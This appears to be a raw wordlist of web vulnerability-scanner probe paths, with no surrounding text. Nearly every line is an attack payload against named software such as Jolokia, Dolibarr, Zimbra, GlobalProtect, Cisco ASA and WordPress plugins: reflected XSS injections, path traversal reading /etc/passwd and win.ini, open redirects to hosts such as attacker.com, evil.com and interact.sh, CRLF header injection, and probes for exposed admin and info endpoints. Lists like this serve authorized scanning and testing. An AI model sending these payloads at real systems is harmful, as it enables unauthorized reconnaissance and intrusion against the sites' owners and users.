/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html
/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html
/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=
/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print
/global-protect/login.esp?user=j%22;-alert(1)-%22x
/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1
/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
/__raw/services/server/info/server-info?output_mode=json
/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
//example.com
//interact.sh
/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/echo-server.html?code=test&state=http://www.interact.sh#
/html/log
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh
/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E
/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/login?next=http://interact.sh/?app.scan/
/signup?next=http://interact.sh/?app.scan/
//www.interact.sh
/IntellectMain.jsp?IntellectSystem=https://www.interact.sh
/fcgi-bin/wgsetcgi
/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=
/html/repository
/services/user/values.xml?var=STATUS
/html/device-id
/select_project.php?url=http://interact.sh
/clock_status.php?current_page=http://interact.sh
/monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1
/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com
/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com
/wp-admin/admin.php
/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3
/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties
/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f
/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html
/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8
/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
/OA_HTML/lcmServiceController.jsp
/node_modules/../../../../../etc/passwd
/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm
/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>
/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/redirector.php?url=https://interact.sh
/redirector.php?do=nodelay&url=https://interact.sh
/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes
/includes/mysql2i/mysql2i.func.php
/addons/phpmailer/phpmailer.php
/adminer/
/adminer.php
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68
/wp-content/uploads/wp-security-audit-log/failed-logins/
/tests/generate.php
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html
/api/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html
/jkstatus
/jkstatus;
/echo-server.html?code=test&state=http://www.example.com#
/echo-server.html?code=test&state=http://www.attacker.com#
/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fexample.com
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com
/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E
/login?next=http://example.com/?app.scan/
/signup?next=http://example.com/?app.scan/
//www.example.com
/IntellectMain.jsp?IntellectSystem=https://www.example.com
/..\..\..\..\Windows\win.ini
/eventum/htdocs/select_project.php?url=http://example.com
/eventum/htdocs/clock_status.php?current_page=http://example.com
/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh
/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh
/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C
/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError
/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
//redirector.php?url=https://example.com
/redirector.php?do=nodelay&url=https://example.com
/redirector.php?url=https://attacker.com
/redirector.php?do=nodelay&url=https://attacker.com
/include/downmix.inc.php
/anchor/errors.log
/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1
/html/common/forward_js.jsp?FORWARD_URL=http://oast.me
/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me
/html/common/forward_js.jsp?FORWARD_URL=http://evil.com
/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com
:4040/jobs/?\
/jobs/?\
/password.htm
